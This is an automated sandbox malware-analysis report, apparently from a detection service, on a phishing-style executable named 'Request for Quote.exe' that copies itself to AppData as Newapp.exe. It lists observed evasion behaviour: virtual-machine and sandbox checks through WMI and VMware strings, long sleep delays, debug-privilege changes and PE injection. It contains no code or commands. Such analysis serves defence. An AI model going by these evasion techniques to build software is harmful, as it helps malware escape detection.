Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match	File source: 00000000.00000002.249097967.00000000025B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.345433821.000000000303E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Newapp.exe PID: 996, type: MEMORY
Source: Yara match	File source: Process Memory Space: Request for Quote.exe PID: 2260, type: MEMORY
Source: Yara match	File source: 14.2.Newapp.exe.30abf98.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quote.exe.25e3b94.1.raw.unpack, type: UNPACKEDPE

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Users\user\Desktop\Request for Quote.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Users\user\Desktop\Request for Quote.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: Request for Quote.exe, 00000000.00000002.249097967.00000000025B1000.00000004.00000001.sdmp, Newapp.exe, 0000000E.00000002.345433821.000000000303E000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: Request for Quote.exe, 00000000.00000002.249097967.00000000025B1000.00000004.00000001.sdmp, Newapp.exe, 0000000E.00000002.345433821.000000000303E000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Source: C:\Users\user\Desktop\Request for Quote.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\Request for Quote.exe	Window / User API: threadDelayed 5732	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Window / User API: threadDelayed 4055	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Window / User API: threadDelayed 2972	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Window / User API: threadDelayed 6804	Jump to behavior

Source: C:\Users\user\Desktop\Request for Quote.exe TID: 5512	Thread sleep time: -100587s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe TID: 5964	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe TID: 6744	Thread sleep time: -23980767295822402s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe TID: 6764	Thread sleep count: 5732 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe TID: 6764	Thread sleep count: 4055 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe TID: 6744	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe TID: 1752	Thread sleep time: -100223s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe TID: 4012	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe TID: 4392	Thread sleep time: -20291418481080494s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe TID: 6972	Thread sleep count: 2972 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe TID: 6972	Thread sleep count: 6804 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe TID: 4392	Thread sleep count: 43 > 30	Jump to behavior

Source: C:\Users\user\Desktop\Request for Quote.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Request for Quote.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: Newapp.exe, 0000000E.00000002.345433821.000000000303E000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Newapp.exe, 0000000E.00000002.345433821.000000000303E000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: Newapp.exe, 0000000E.00000002.345433821.000000000303E000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: Newapp.exe, 0000000E.00000002.345433821.000000000303E000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\user\Desktop\Request for Quote.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\Users\user\Desktop\Request for Quote.exe

Code function: 5_2_01410A76 KiUserExceptionDispatcher,KiUserExceptionDispatcher,KiUserExceptionDispatcher,LdrInitializeThunk,

5_2_01410A76

Source: C:\Users\user\Desktop\Request for Quote.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Request for Quote.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\Request for Quote.exe	Memory written: C:\Users\user\Desktop\Request for Quote.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Memory written: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\Request for Quote.exe	Process created: C:\Users\user\Desktop\Request for Quote.exe C:\Users\user\Desktop\Request for Quote.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process created: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process created: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process created: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process created: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Process created: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Jump to behavior

Source: Request for Quote.exe, 00000005.00000002.503760793.0000000001950000.00000002.00000001.sdmp, Newapp.exe, 00000014.00000002.502802020.0000000001E80000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: Request for Quote.exe, 00000005.00000002.503760793.0000000001950000.00000002.00000001.sdmp, Newapp.exe, 00000014.00000002.502802020.0000000001E80000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: Request for Quote.exe, 00000005.00000002.503760793.0000000001950000.00000002.00000001.sdmp, Newapp.exe, 00000014.00000002.502802020.0000000001E80000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: Request for Quote.exe, 00000005.00000002.503760793.0000000001950000.00000002.00000001.sdmp, Newapp.exe, 00000014.00000002.502802020.0000000001E80000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: Request for Quote.exe, 00000005.00000002.503760793.0000000001950000.00000002.00000001.sdmp, Newapp.exe, 00000014.00000002.502802020.0000000001E80000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Users\user\Desktop\Request for Quote.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
